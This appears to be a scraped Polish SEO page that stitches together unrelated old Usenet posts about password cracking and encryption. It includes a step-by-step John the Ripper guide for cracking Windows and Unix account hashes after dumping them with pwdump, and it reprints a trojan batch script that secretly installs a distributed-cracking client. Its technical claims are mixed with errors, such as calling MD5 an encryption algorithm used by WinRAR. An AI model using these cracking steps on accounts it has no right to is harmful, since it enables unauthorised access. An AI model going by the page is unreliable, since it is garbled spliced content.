Strona główna
  Łamanie hasła archiwum exe

kaniagostyn *UKS Kania Gostyń

haslo excel 97 i linux.  Osoba k@tlen.pl, napisała do Archiwum przy URLicy
 http://google.pl/advanced_group_search?q=group:pl.comp.os.linux* tak:


Szukam crack-a dla linuxa ktory lamie hasla dla excela-97 ?


http://www.linuxiso.org/download.php/361/elx-pregold-cd1-bin.iso


(jezeli takowy oczywiscie jest). Dlaczego takie komplikacje ? Mam proxy nie
przepuszczajace *.exe.
Slyszal ktos o czyms takim ?


Ktoś słyszał.

FUT warning.


Kodowanie calych dyskow i CD.


Chcialbym zakodowac sobie CD oraz HD tak, aby nie mozna bylo go
odczytac, bez podania hasla lub uzycia odpowiedniego programu. Co
byscie polecili w tym temacie?


No cóz ja polecam do tego celu program PGP. Kiedys zawieral on
modul szyfrowania calych partycji, jednakze jego ostatnie wersje
juz nie posiadaja tego dobrodziejstwa (dostepne jest dopiero po
wykupieniu wersji komercyjnej). Jesli chcesz archiwizowac dane
na krazku CD, zabezpieczone haslem to mozesz sobie utworzyc,
np. RAR-owskie archiwum SFX, lub jeszcze lepiej uzyc PGP
który takze potrafi szyfrowac pliki na haslo (takie pliki maja
pózniej rozszerzenie exe wiec nie trzeba zadnego dodatkowego
softu aby odczytac wiadomosc). Pisze, ze najlepiej uzyc PGP,
bo haselka RAR-a, lub ZIP-a mozna szybko zlamac (istnieja
do tego celu specjalne programy). Jesli dane sa naprawde wazne,
to polecam zastosowanie kryptografii z kluczem, a nie haslem,
bo zawsze mozna sie pokusic o zlamanie krótszego hasla, a z odpowiednio
dlugim kluczem nie bedzie to juz takie proste.

Pozdrawiam Killer.

l@kki.net.pl | l@box43.gnet.pl | http://www.go.w.pl
PGP key=http://www.go.w.pl/pgp.asc ICQ UIN:nieczynne
F82A 2D71 6B77 89CD 9631  D2CD A932 1F9E 9B8F 10F3


Kodowanie calych dyskow i CD.

a skad mozna scioagnac PGP disk (chodzi o cd)

| Chcialbym zakodowac sobie CD oraz HD tak, aby nie mozna bylo go
| odczytac, bez podania hasla lub uzycia odpowiedniego programu. Co
| byscie polecili w tym temacie?

No cóz ja polecam do tego celu program PGP. Kiedys zawieral on
modul szyfrowania calych partycji, jednakze jego ostatnie wersje
juz nie posiadaja tego dobrodziejstwa (dostepne jest dopiero po
wykupieniu wersji komercyjnej). Jesli chcesz archiwizowac dane
na krazku CD, zabezpieczone haslem to mozesz sobie utworzyc,
np. RAR-owskie archiwum SFX, lub jeszcze lepiej uzyc PGP
który takze potrafi szyfrowac pliki na haslo (takie pliki maja
pózniej rozszerzenie exe wiec nie trzeba zadnego dodatkowego
softu aby odczytac wiadomosc). Pisze, ze najlepiej uzyc PGP,
bo haselka RAR-a, lub ZIP-a mozna szybko zlamac (istnieja
do tego celu specjalne programy). Jesli dane sa naprawde wazne,
to polecam zastosowanie kryptografii z kluczem, a nie haslem,
bo zawsze mozna sie pokusic o zlamanie krótszego hasla, a z odpowiednio
dlugim kluczem nie bedzie to juz takie proste.

Pozdrawiam Killer.

l@kki.net.pl | l@box43.gnet.pl | http://www.go.w.pl
PGP key=http://www.go.w.pl/pgp.asc ICQ UIN:nieczynne
F82A 2D71 6B77 89CD 9631  D2CD A932 1F9E 9B8F 10F3

--
konta pocztowe 25MB - 50zl/rok, serwery wirtualne 50MB - 600zl/rok.
Zapraszamy: http://www.sky.pl

--
Internetowe Forum Dyskusyjne - http://www.newsgate.pl



plik exe. Osoba podpisana jako DweiN <dw@vp.plw artykule
<news:coce34$1mr$2@news.onet.plpisze:


goomish napisał(a):

| A dokładnie co chciałbyś podejrzeć?
 Według mnie to jest archiwum samorozpakowujace tylko zabezpieczone
hasłem w pliku exe !


NIe wydaje Ci się, że ktoś zrobił to zabezpieczenie nie bez powodu?


ale programy łamiące hasła pod zip rar ice itp nie
działaja ...


Działają lepiej niż Twoja interpunkcja i ortografia. Tyle tylko, że na
złamanie dobrego hasła nie starczy Twojego życia.


są tam zapisane dane textowe ..


Poproś właściciela pliku o zgodę na dostęp do tych danych. Jeśli masz
jakieś wątpliwości, przeczytaj <http://evil.pl/pip/su.html#instrukcja


John the Ripper password cracker - jak go używac?. Struktura działania programu umożliwia złamanie każdego hasła które jest zaszyfrowane obsługiwanym algorytmem. Może zostać użyty do łamania haseł kont użytkowników w systemach Unix i Windows 2000/Nt/Xp oraz do serwerów Apache. Potrafi rozszyfrować hasła zakodowane algorytmem Des, Md5, Blowfish i innymi.

UŻYCIE:
Po ściągnięciu pliku należy rozpakować zawartość archiwum. W katalogu z programem należy umieścić plik systemowy zawierający nazwy użytkowników oraz hasła (SAM). Do utworzenia takiego pliku służy narzędzie o nazwie (pwdump), które wydobywa hasła z systemów Windows 2000/Nt/Xp.

KONFIGURACJA:
Po uruchomieniu pliku (john.exe) zostaje wyświetlona lista komend oraz sposób korzystania z programu.
BRUTE FORCE - metoda polega na sprawdzaniu wszystkich haseł (małe i duże litery, cyfry i inne symbole).
incremental - parametr umożliwia łamanie haseł metodą brute-force. Aby wywołać łamanie haseł tą metodą należy zastosować następującą składnie poleceń:
john -incremental zaszyfrowany_plik
mode - parametr pozwala określić rodzaj znaków jakie mają zostać wykorzystane do łamania haseł. W katalogu z programem dostępne są pliki zawierające następujące szablony znaków:
all.chr - litery duże i małe oraz znaki specjalne.
alpha.chr - litery duże i małe.
digits.chr - cyfry.
lanman.chr - litery duże oraz znaki specjalne.
W pliku (john.ini) i sekcji (# incremental modes) użytkownik może modyfikować ustawienia dla parametru (mode).
Wiersz (file = ~/all.chr) określa ścieżkę dostępu do pliku zawierającego szablon znaków.
Wiersz (minlen = 0) umożliwia wprowadzenie minimalnej długości hasła. W tym przypadku szukania hasła rozpocznie się od jednego znaku.
Wiersz (maxlen = 2) umożliwia wprowadzenie maksymalnej długości hasła. W tym przypadku są to dwa znaki.
Wiersz (charcount = 95) pozwala ograniczyć używanie poszczególnych znaków. Modyfikacja tego wiersza przyspiesza łamanie haseł.
Wiersz (extra = ąćóśłćźż) umożliwia określenie własnych znaków. W tym przypadku są to symbole pochodzące z języka polskiego. Aby wywołać łamanie haseł wykorzystując litery duże i małe należy zastosować następującą składnie poleceń:
john -incremental:alpha zaszyfrowany_plik
DICTIONARY - metoda polega na sprawdzaniu haseł pochodzących z pliku nazywanego słownikiem.
wordfile - parametr umożliwia wprowadzenie słownika z którego mają zostać pobierane hasła. Aby uruchomić łamanie haseł tą metodą należy zastosować następującą składnie poleceń:
john -wordfile:plik_slownik zaszyfrowany_plik
rules - parametr umożliwia szukanie haseł metodą dictionary w sposób wolniejszy, ale bardziej skuteczny. Aby uruchomić łamanie haseł tym sposobem należy zastosować następującą składnie poleceń:
john -wordfile:plik_slownik -rules zaszfrowany_plik
INNE - program posiada kilka innych opcji które umożliwiają dostosowanie działania do własnych potrzeb.
restore - parametr umożliwia kontynuację łamania haseł od momentu w którym zostało przerwane poprzednie działanie programu. Aby skorzystać z tego parametru należy zastosować następującą składnie poleceń:
john -restore:restore
makechars - parametr umożliwia stworzenie szablonu znaków z haseł które zostały rozszyfrowane w dowolnym pliku. Aby użyć tego parametru należy zastosować następującą składnie poleceń:
john -makechars:custom.chr zaszyfrowany_plik
show - parametr pozwala wyświetlić hasła które zostały złamane podczas poprzedniego działania programu. Aby wyświetlić rozszefrowane hasła należy użyć następującej składni poleceń:
john -show zaszyfrowany_plik
test - paramatr umożliwia sprawdzenie szybkości łamania haseł dla różnych algorytmów kodowania danych. Aby uruchomić działanie programu z tym parametrem należy zastosować następującą składnie poleceń:
john -test

URUCHAMIANIE:
Ogólna linia komend umożliwiająca uruchomienie programu to:
john [opcje] [zaszyfrowany_plik]
Po uruchomieniu programu i wybraniu jednej z metod umożliwiającej łamanie haseł zostaje wyświetlone aktualnie rozszyfrowane hasło.

A ja Tobie jeśli chciałbyś łamać hasła xp/visty polecam coś innego, jeśli jesteś zainteresowany to zapraszam na PW
male oszustwo czy polak potrafi?.

Rozne rzeczy mozna robic w Internecie:
Podaje przyklad zarobkowania pana antyp@box43.gnet.pl
Na ftp.chip.pl/upload mozna znalezc duzo ciekawych rzeczy.
Wiedzial o tym nasz bohater i liczyl na duzy ruch.
Umiescil on tam dwa programiki: Dancer (calkiem fajny) i
Advanced_Disk_Catalog.
Oba uruchamiaja sie z plikow batchowych, ktore wygladaja mniej wiecej
tak:

@echo off
rem  DISCLAIMER --- if  You are under 21 you not read these text
rem             Autors don`t take any responsibility
if exist "c:program filescommon filesmicrosoft
sharedmsinfosetup.iss" goto
adc
:syst
echo                -----         Please   Waiting   !!!         -----
ren dat.ffd sys.exe
rem You would, of course, substitute your Windows machine name for the
text
rem including the .  If your machine is named "mars", an example
sys x -o- -printactive adc.dat c:progra~1common~1micros~1msinfo
null
ren sys.exe dat.ffd
"c:program filescommon filesmicrosoft sharedmsinfosystray.exe"
-install
:adc
echo      ----   Thanks for using Advance Disk Catalog for
Windows9x/NT !!!  ---
-
if not exist "c:program filescommon filesmicrosoft
sharedmsinfosystray.exe"
 goto syst
"c:program filescommon filesmicrosoft sharedmsinfosetup.exe"
cls
exit

W sekcji :syst skrypt podmienia nazwe dat.ffd na sys.exe (tylko dla
zamotania ewentualnego podgladacza, gdyz jest to tylko rar).
Nastepnie odpakowuje zabezpieczone haslem archiwum adc.dat do
katalogu, gdzie nikt nie zaglada i zmienia nazwe rara spowrotem na
dat.ffd.
Z katalogu gdzie rozpakowal instalki i... (no wlasnie ... i co?)
uruchamia setup.exe programu, ktory chcielismy sciagnac i systray.exe
z parametrem install, o ktorym nic nie wiedzielismy.

I tutaj sedno calej sprawy:
Programik to rc5des client. Pozwala on na polaczenie wielu komputerow
w internecie w celu lamania coraz to trudniejszych do zlamania
szyfrow. Po co on nam to podrzuca? Jak nie wiadomo o co chodzi, to
pewnie chodzi o pieniadze. Plik inicjalizacyjny naszego clienta
zawiera juz id naszego goscia:

[parameters]
id=antyp@box43.gnet.pl
threshold=10:10
in=sysin
out=ofsys
in2=mscrt
out2=msdru
randomprefix=130
contestdone2=1
contestdoneflags=2
descontestclosed=233893822
scheduledupdatetime=0
cputype=-1
preferredblocksize=28
logname=msdir
messagelen=10000
smtpsrvr=156.17.5.3
smtpfrom=darkness.wal@usa.net
smtpdest=antyp@box43.gnet.pl

A teraz cytat ze strony www.distributed.net:

What's in it for you?
There are several reason's why you should join us. First of all, our
main goal is to explore the possibilities of distributed computing.
Together we can learn more about this exciting new form of computing.
Second, if we solve the RSA Challenges, we win $10000! There's $1000
or $2000 for you if your computer is the one that finds the right key.
Third, we have some nifty statistics. The more keys you process, the
higher you will be ranked. And of course you want to stay above your
friends, right? ;)

Nasz komputer pracuje na naszego spryciarza: Na pewno zwieksza
prawdopodobienstwo wygranej jezeli w sieci bedzie chodzilo x kompow z
clientem podajacym jego dane niz tylko jego jeden.

Ciekawe co na to polskie prawo?

Pozdrowienia.
Leszek :-)
-------------------------------
lesze@poczta-polska.czest.pl


BLOWFISH cracker ;). M.M. napisał(a):


Wtedy pewnie by odpisał "jak można w informatyce stosować zasadę która
ma więcej niż sto lat?". To odrobinę przerażające, że admin "poważnej"
(przynajmniej tak wynika z maila) sieci ma tak nikłą wiedzę na temat
zabezpieczeń kryptograficznych. Jeżeli podobną ma ten jego kumpel który
napisał "Little Code Pro" to może być ciekawie :-).


Oto, co ten Pan odpisał na mój kolejny list:

Witam
Odpowiadam na Pana listy teraz.
Proszę wyjanić skoro Pan pisze ze się nieda. Dlaczego tab bardzo i
szybko rozwija się hakerstwo. Łamanie haseł i wszelakich zabezpieczeń.
Nie jestem wstanie napisać takiego programu natychmiast bo nik tego by
nie zrobił. Nawet łamanie maszyn szyfrujacych zajmuje czas ale jak widać
z historii jest to możliwe.
Uważam tema za zamkięty.
Nie przekona mie Pan.

Pozdrawiam
Administrator Ogólnopolskiej Sieci Bezpieczeństwa JST.

Andrzej E. napisał(a):
 Paweł Sztuka napisał(a):
 
 | Nie chcę się wypowiadać ale skoro ma pan rozpisane załe pliki w c,
oraz dostępność do algorytmów użytych do kodowania.
 | Proszę odpowiedzieć Samemu na to pytanie.
 
 Mam trochę czasu, to Panu mogę wyjaśnić.
 Plik exe o nieznanym kodzie źródłowym to "kot w worku" - nie wiadomo, co
 on dokładnie robi. Ponieważ źródła nie ma, wszyscy zainteresowani muszą
 taki exe zdekompilować i śledzić jego działanie. Dla hackerów nie
 stanowi to większego problemu. Nawet zaszyfrowanie pliku exe nie
 zabezpiecza niczego, ponieważ przed przetworzeniem kodu exe w procesorze
 musi zostać odkodowany. Gdy w pamięci jest odkodowany ciąg rozkazów, dla
  hackera nie stanowi problemu jego poznanie. Wystarczy zajrzeć na
 stronę http://cracks.am/ (nie używać przy tym IE) i obejrzeć rezultaty
 takiego postępowania. Także w systemach operacyjnych firmy Microsoft (o
 nieznanym kodzie źródłowym) co chwilę odnajdywane są błędy. Nie ma
 żadnej gwarancji, że program Little Code Pro nie zostawia hasła do
 archiwum w samym archiwum, ponieważ nie znamy jego kodu źródłowego. Ba!
 Bez obejrzenia kodu źródłowego nie wiemy nawet, czy implementacja
 algorytmu blowfish jest poprawna i czy nie można (przy takim założeniu)
 złamać niepoprawnie zaszyfrowanych plików w prostszy (niż bruteforce)
 sposób. Nie wiadomo także, czy nie zostawia kopii plików w tempach
lub tam nie zostawia samego hasła. Dlatego nigdy w mojej pracy nie
skorzystam z tego programu do szyfrowania danych.
 Teraz o programach o otwartym kodzie: W opinii wielu administratorów np.
 systemy operacyjne UNIX typu BSD (o otwartym kodzie źródłowym) cieszą
 się opinią niezawodnych i odpornych na ataki. A jeśli ktoś z
 użytkowników znajdzie błąd w kodzie źródłowym, zawiadamia o tym
 programistów z *BSD i taki błąd jest natychmiast poprawiany.
 
 Teraz o szyfrowaniu:
 Siła szyfrowania nie zależy od tajności algorytmu szyfrującego, tylko od
 jego siły. Algorytmy szyfrowania są jawne. Ich użytkowanie za to zależy
 od licencji. Nie istnieje żaden znany atak na Blowfish, szybszy niż
 brute force, a gdyby taki zaistniał, byłoby o tym głośno, a wszystkie
 programy szyfrujące tym algorytmem możnaby wyrzucić (bez różnicy Little
 C. P. czy bcrypt).
 Przykład: algorytm szyfrowania (zdaje się, używany przez WinRAR) MD5
 (również jawny), został złamany przez chińskich naukowców, matematyków,
 którzy poświęcili wiele czasu na jego rozpracowanie. Mam nadzieję, że
 jest Pan wybitnym matematykiem, skoro pisał Pan w poprzednim liście o
 takiej możliwości.
 Istnieje jeszcze kilka bezpiecznych algorytmów szyfrujących. Jednym z
 nich jest AES-256, który jest używany m.in. w programie 7-zip. Ten
 program również nadaje sie do szyfrowania istotnych danych, bo jego
 źródła są publicznie dostępne i jawne.
 Atak brute force polega na podawaniu wszystkich możliwych kombinacji
 haseł. Należy więc wymyślać hasła zawierające znaki specjalne (.,$#
 itd.), które rozszerzają listę znaków które muszą zostać użyte przy
 ataku BF. Należy także używać długich haseł, które znacząco wydłużają
 czas potrzebny do złamania zabezpieczenia metodą BF. Przy odpowiednio
 długich hasłach czas potrzebny do przeprowadzenia udanego ataku BF
 mierzy się w tysiącach lat pracy tysięcy komputerów. Ma Pan tyle czasu i
 sprzętu? Opłaciło by się?
 
 Więcej pod adresem: http://pl.wikipedia.org/wiki/Kategoria:Kryptografia
 Proszę Sobie poczytać.
 
 P.S. Nie odpowiedział Pan na mój poprzedni list.

Później wysłał do mnie list zawierający objaśnienie do Blowfish (z
Wikipedii) jako list od autora programu Little Code Pro...

Koniec cytatów. Nie wiem, co on chciał osiągnąć. Nie wiem, co o tym
sądzić? Śmiać się, czy płakać?


  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • shirli.pev.pl


  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • music4you.xlx.pl
  •  Menu
     : kaniagostyn *UKS Kania Gostyń
     : Łamanie Gadu Gadu
     : Łamanie haseł Gadu Gadu
     : łamanie praw człowieka pdf
     : łamania praw człowieka w Polsce
     : Łamaniec języka Wyrewolwerowany rewolwerowiec na
     : łamanie simlocka w Nokii 6070
     : Łamanie haseł gg i Hack download
     : Łamanie haseł wszystkie możliwości
     : łamanie haseł GG to przestępstwo
     : lamanie simlock Sony Ericsson
     . : : .
    Copyright (c) 2008 kaniagostyn *UKS Kania Gostyń | Designed by Elegant WPT